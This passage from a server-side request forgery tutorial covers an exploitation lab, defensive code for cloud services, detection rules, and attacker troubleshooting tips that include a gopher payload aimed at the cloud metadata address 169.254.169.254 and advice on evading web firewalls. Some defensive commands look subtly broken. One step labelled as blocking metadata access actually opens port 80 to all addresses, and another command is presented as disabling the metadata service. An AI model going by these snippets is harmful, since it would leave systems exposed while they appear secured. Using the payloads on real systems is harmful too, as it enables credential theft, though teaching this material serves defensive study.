    // Extract credentials from SSRF response
}

function canAccess(target, credentials) {
    // Check if we can access the target with the credentials
}

Hands-On Challenge #5: Advanced SSRF Lab

Try This: Set up a complex SSRF exploitation environment:

# Create Docker network
docker network create ssrf-network

# Run vulnerable application
docker run -d --name vuln-app --network ssrf-network -p 8080:80 vulnerable-ssrf-app

# Run fake AWS metadata service
docker run -d --name aws-imds --network ssrf-network amazon/amazon-ec2-metadata-mock

# Run internal service with sensitive data
docker run -d --name internal-api --network ssrf-network internal-api-server

# Now chain multiple techniques to:
# 1. Discover the internal network
# 2. Access the AWS metadata service
# 3. Use discovered credentials to access the internal API
# 4. Exfiltrate sensitive data

Defense Perspective: Protecting Cloud Infrastructure

Now that we understand SSRF attacks, let's explore how to defend against them.

SSRF Prevention Strategies

1. Input Validation and Sanitization

# Python example of proper URL validation
from urllib.parse import urlparse
import ipaddress

def is_safe_url(url):
    """
    Validate URL against SSRF vulnerabilities
    """
    try:
        # Parse the URL
        parsed = urlparse(url)
        
        # Ensure scheme is allowed
        if parsed.scheme not in ['http', 'https']:
            return False
        
        # Ensure hostname is provided and not localhost
        if not parsed.netloc or parsed.netloc.lower() == 'localhost':
            return False
            
        # Resolve hostname to IP
        import socket
        ip = socket.gethostbyname(parsed.netloc.split(':')[0])
        
        # Check for internal IPs
        ip_addr = ipaddress.ip_address(ip)
        
        if (ip_addr.is_private or
            ip_addr.is_loopback or
            ip_addr.is_link_local or
            ip_addr.is_multicast or
            ip_addr.is_reserved):
            return False
            
        return True
    except Exception as e:
        print(f"URL validation error: {e}")
        return False

2. Implement Allowlists Instead of Denylists

# Allowlist-based approach
ALLOWED_DOMAINS = ['api.trusted.com', 'cdn.trusted.com', 'assets.trusted.com']

def is_allowed_url(url):
    """
    Check if URL is in the allowlist
    """
    try:
        parsed = urlparse(url)
        hostname = parsed.netloc.lower().split(':')[0]
        
        # Check exact matches
        if hostname in ALLOWED_DOMAINS:
            return True
            
        # Check for subdomains of allowed domains
        for domain in ALLOWED_DOMAINS:
            if hostname.endswith('.' + domain):
                return True
                
        return False
    except Exception:
        return False

3. Use Dedicated Service Accounts with Limited Permissions

# Terraform example for creating limited IAM role for EC2
resource "aws_iam_role" "limited_ec2_role" {
  name = "limited-ec2-role"
  
  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = "sts:AssumeRole"
        Effect = "Allow"
        Principal = {
          Service = "ec2.amazonaws.com"
        }
      }
    ]
  })
}

# Minimal permissions policy
resource "aws_iam_role_policy" "limited_policy" {
  name = "minimal-permissions"
  role = aws_iam_role.limited_ec2_role.id
  
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Action = [
          "s3:GetObject",
          "s3:ListBucket",
        ]
        Effect   = "Allow"
        Resource = [
          "arn:aws:s3:::specific-bucket",
          "arn:aws:s3:::specific-bucket/*"
        ]
      }
    ]
  })
}

4. Network-Level Controls

# AWS security group configuration to block metadata service
aws ec2 modify-instance-attribute \
  --instance-id i-1234567890abcdef0 \
  --groups sg-1a2b3c4d

# Create security group that blocks access to metadata service
aws ec2 create-security-group \
  --group-name block-metadata-access \
  --description "Block access to EC2 metadata service"

aws ec2 authorize-security-group-ingress \
  --group-id sg-1a2b3c4d \
  --protocol tcp \
  --port 80 \
  --cidr 0.0.0.0/0

# Block access to metadata service
aws ec2 create-network-acl-entry \
  --network-acl-id acl-1a2b3c4d \
  --rule-number 100 \
  --protocol tcp \
  --rule-action deny \
  --cidr-block 169.254.169.254/32 \
  --port-range From=80,To=80

5. Advanced WAF Rules for SSRF Protection

# ModSecurity rule to block SSRF attempts
SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|REQUEST_COOKIES "@rx (localhost|127\.0\.0\.1|0\.0\.0\.0|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|169\.254\.|::1|fc00:|fe80:|f[cd][0-9a-f][0-9a-f]:)" \
    "id:1000005,\
    phase:2,\
    block,\
    log,\
    msg:'Potential SSRF Attack'"

6. Enhanced Cloud Metadata Service Protection

# AWS IMDSv2 enforcement
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

# Azure - Disable IMDS completely if not needed
az vm identity remove --name my-vm --resource-group my-resource-group

Secure Coding Practices for SSRF Prevention

1. Use Safe Libraries and Frameworks

// Node.js example using the 'got' library with allowlist
const got = require('got');
const { URL } = require('url');

async function fetchResource(urlString) {
    try {
        // Validate URL against allowlist
        const url = new URL(urlString);
        
        // Allowlist check
        const allowedDomains = ['api.trusted.com', 'cdn.trusted.com'];
        if (!allowedDomains.includes(url.hostname)) {
            throw new Error('Domain not in allowlist');
        }
        
        // Safe request with timeout and redirect limits
        const response = await got(url.toString(), {
            timeout: 5000,
            followRedirect: false, // Prevent redirect-based bypasses
            retry: 0 // No retries
        });
        
        return response.body;
    } catch (error) {
        console.error('Error fetching resource:', error);
        throw new Error('Failed to fetch resource');
    }
}

2. Use an HTTP Proxy for External Requests

# Python example using a dedicated HTTP proxy
import requests

def fetch_external_url(url):
    """
    Fetch external URL through a controlled proxy
    """
    # Proxy configuration
    proxies = {
        'http': 'http://internal-proxy:8080',
        'https': 'http://internal-proxy:8080'
    }
    
    try:
        # The proxy should have allowlist rules configured
        response = requests.get(
            url,
            proxies=proxies,
            timeout=5,
            allow_redirects=False
        )
        return response.text
    except Exception as e:
        print(f"Error fetching via proxy: {e}")
        return None

3. Implement Context-Specific Output Encoding

# Python example ensuring proper output encoding
import html

def fetch_and_display_url_content(url, context):
    """
    Fetch URL content and properly encode for display context
    """
    try:
        # Assuming url has been validated elsewhere
        response = requests.get(url, timeout=5)
        content = response.text
        
        # Apply context-specific encoding
        if context == 'html':
            # Escape HTML special characters
            safe_content = html.escape(content)
        elif context == 'javascript':
            # Escape for JavaScript context
            safe_content = json.dumps(content)
        elif context == 'url':
            # URL encode
            safe_content = urllib.parse.quote(content)
        else:
            # Default: treat as plaintext
            safe_content = content
            
        return safe_content
    except Exception as e:
        return f"Error processing content: {e}"

Cloud-Specific SSRF Defenses

1. AWS Defense in Depth

# 1. Enforce IMDSv2
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

# 2. Use VPC endpoints with restrictive policies
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-1a2b3c4d \
  --service-name com.amazonaws.us-east-1.s3 \
  --policy file://restrictive-policy.json

# 3. Implement SCPs (Service Control Policies) to restrict organization-wide permissions
aws organizations create-policy \
  --content file://restrictive-scp.json \
  --name "RestrictHighRiskActions" \
  --type SERVICE_CONTROL_POLICY

2. Azure Defense in Depth

# 1. Use Azure Private Link for Azure services
az network private-link-service create \
  --name myPrivateLinkService \
  --resource-group myResourceGroup \
  --vnet-name myVNet \
  --subnet mySubnet \
  --lb-name myLoadBalancer \
  --ip-configs myIPConfig

# 2. Implement Azure Policy to enforce security controls
az policy definition create \
  --name 'restrict-metadata-access' \
  --display-name 'Restrict access to Instance Metadata Service' \
  --description 'This policy restricts access to the Azure Instance Metadata Service' \
  --rules 'restrictive-policy.json' \
  --mode All

# 3. Use Just-In-Time VM Access
az security jit-policy create \
  --name myJITPolicy \
  --resource-group myResourceGroup \
  --location eastus \
  --vm-name myVM

3. GCP Defense in Depth

# 1. Use VPC Service Controls
gcloud access-context-manager perimeters create my-perimeter \
  --title="My GCP Perimeter" \
  --resources=projects/my-project \
  --restricted-services=storage.googleapis.com

# 2. Implement custom metadata headers requirement 
gcloud compute instances add-metadata my-instance \
  --metadata=google-compute-enable-custom-metadata-header-auth=TRUE

# 3. Use organization policies to restrict resource usage
gcloud resource-manager org-policies enable-enforce \
  --organization=123456789012

SSRF Detection and Monitoring

# Detection rule for AWS CloudTrail
{
  "filter": {
    "eventName": [
      "GetCallerIdentity",
      "AssumeRole",
      "GetSessionToken"
    ],
    "userIdentity.type": [
      "AssumedRole"
    ],
    "eventSource": [
      "sts.amazonaws.com"
    ]
  },
  "description": "Detect potential exploitation of SSRF via IAM credential access",
  "groupByFields": [
    "userIdentity.principalId",
    "userIdentity.arn"
  ],
  "alertThreshold": {
    "count": 5,
    "duration": {
      "minutes": 5
    }
  }
}

Hands-On Challenge #6: SSRF Defense Lab

Try This: Implement a secure proxy to mitigate SSRF:

# Flask-based URL fetching proxy with SSRF protections
from flask import Flask, request, Response
import requests
from urllib.parse import urlparse
import ipaddress
import socket

app = Flask(__name__)

ALLOWED_DOMAINS = ['api.github.com', 'api.twitter.com', 'api.weather.gov']
ALLOWED_SCHEMES = ['https']
MAX_REDIRECTS = 0
TIMEOUT = 5

def is_internal_ip(hostname):
    try:
        # Resolve hostname to IP
        ip = socket.gethostbyname(hostname)
        ip_addr = ipaddress.ip_address(ip)
        
        return (ip_addr.is_private or
                ip_addr.is_loopback or
                ip_addr.is_link_local or
                ip_addr.is_multicast or
                ip_addr.is_reserved)
    except:
        return True  # Fail closed

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url', '')
    
    try:
        # Parse URL
        parsed = urlparse(url)
        
        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return "Unsupported scheme", 400
            
        # Check for hostname
        if not parsed.netloc:
            return "Missing hostname", 400
            
        # Check allowlist
        hostname = parsed.netloc.lower().split(':')[0]
        if hostname not in ALLOWED_DOMAINS:
            return "Domain not allowed", 403
            
        # Check for internal IP
        if is_internal_ip(hostname):
            return "Internal hostname not allowed", 403
            
        # Make the request with strict security controls
        response = requests.get(
            url,
            timeout=TIMEOUT,
            allow_redirects=False,
            headers={
                'User-Agent': 'SecureProxy/1.0'
            }
        )
        
        # Return the response with limited headers
        filtered_headers = {
            k: v for k, v in response.headers.items()
            if k.lower() in ['content-type', 'content-length']
        }
        
        return Response(
            response.content,
            status=response.status_code,
            headers=filtered_headers
        )
        
    except Exception as e:
        return f"Error: {str(e)}", 500

if __name__ == '__main__':
    app.run(port=8000)

Common Pitfalls & Troubleshooting

SSRF Hunting Pitfalls

Pitfall Description Solution
False Positives Mistaking normal behavior for SSRF vulnerability Validate findings with controlled payloads
Limited Visibility Unable to see server responses directly Use callback techniques with unique identifiers
Response Filtering Target application filters or sanitizes responses Focus on exfiltration via side channels
Unstable Internal Services Internal services may be intermittently available Implement retry mechanisms with backoff
WAF Detection Modern WAFs detect common SSRF payloads Develop custom, targeted payloads for each scenario

When All Else Fails: Advanced Troubleshooting

If standard SSRF techniques aren't working, try these advanced approaches:

  1. Multiple Protocol Testing: Try less common URL schemes like dict://, tftp://, or ldap://
  2. Custom DNS Resolution: Set up your own DNS server to control resolution behavior
  3. WebSocket Pivoting: Use WebSockets to establish persistent communication
  4. Malformed URLs: Test URLs with unusual formats that might confuse parsers
  5. Nested Protocol Handlers: Try schemes like gopher://169.254.169.254:80/xGET%20/latest/meta-data/

Quick Reference: SSRF Troubleshooting Flow

1. Confirm vulnerability → 2. Test standard payloads → 3. Analyze responses
   ↓                         ↓                           ↓
6. Document                5. Attempt protocol         4. Check for partial
   success                    pivoting                    success indicators

Future SSRF Research Directions

Emerging SSRF Attack Surfaces

  1. Serverless Function Exploits: SSRF against cloud function environments
  2. GraphQL Resolver Abuse: Exploiting custom resolvers in GraphQL APIs
  3. Service Mesh Vulnerabilities: Targeting service discovery mechanisms
  4. Edge Computing SSRF: Exploiting edge node configurations
  5. IoT Hub Exploitation: Leveraging device management interfaces

Potential Future SSRF Defense Mechanisms

  1. Runtime Application Self-Protection (RASP): Detecting and blocking SSRF attempts at runtime
  2. Zero Trust Network Architecture: Eliminating implicit trust in internal networks
  3. DNS-Based Monitoring: Detecting suspicious DNS resolution patterns
  4. AI-Based Request Analysis: Using machine learning to identify anomalous requests
  5. Hardware-Based Isolation: Using secure enclaves to protect sensitive operations

Key Takeaways & Resources

SSRF Attack Methodology Summary

  1. Discovery: Identify potential SSRF entry points
  2. Validation: Confirm the vulnerability exists
  3. Exploration: Map internal network and available services
  4. Escalation: Target high-value services and metadata endpoints
  5. Exfiltration: Extract sensitive data through available channels
  6. Lateral Movement: Use discovered credentials to access other systems

Essential SSRF Tools

  • Burp Suite Professional: SSRF testing module
  • SSRFmap: Automated SSRF exploitation
  • Gopherus: Crafting Gopher payloads
  • AWS Metadata Tester: Specific tool for AWS environments
  • Metasploit SSRF Modules: Automated exploitation frameworks
  • Research Papers: "Server-Side Request Forgery: Attack and Defense" (Black Hat Asia 2023)
  • GitHub Repositories: PayloadsAllTheThings/SSRF Injection
  • Books: "Cloud Security: Advanced Exploitation Techniques"

Remember: The objective of security research is to improve overall security. Use these techniques responsibly and ethically, and always get proper authorization before testing.

Read more